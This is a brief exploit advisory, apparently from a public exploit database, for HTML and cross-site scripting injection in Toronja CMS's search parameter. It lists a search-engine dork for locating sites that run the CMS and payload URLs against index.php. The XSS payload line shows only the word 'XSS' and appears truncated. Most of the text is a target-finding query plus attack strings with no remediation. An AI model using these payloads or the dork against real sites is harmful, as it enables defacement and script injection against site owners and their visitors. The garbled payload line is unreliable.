Toronja CMS - HTML / Cross-Site Scripting Injection

EKU-ID: 19908	CVE:	OSVDB-ID:
Author: CoBRa_21	Published: 2010-05-27	Verified:
Download:

Rating

☆☆☆☆☆

-------------------------------------------------------------------------------------------

Toronja Cms HTML/XSS Injection Vulnerability

-------------------------------------------------------------------------------------------

Author : CoBRa_21

Script Home : http://www.toronja.com.pe/

Dork : intext:"sitio web diseñado por www.toronja.com.pe"

-------------------------------------------------------------------------------------------

HTML Injection:

http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=<font size=15 color=green>CoBRa_21</font>HTML

-------------------------------------------------------------------------------------------

XSS Injection:

http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=XSS

-------------------------------------------------------------------------------------------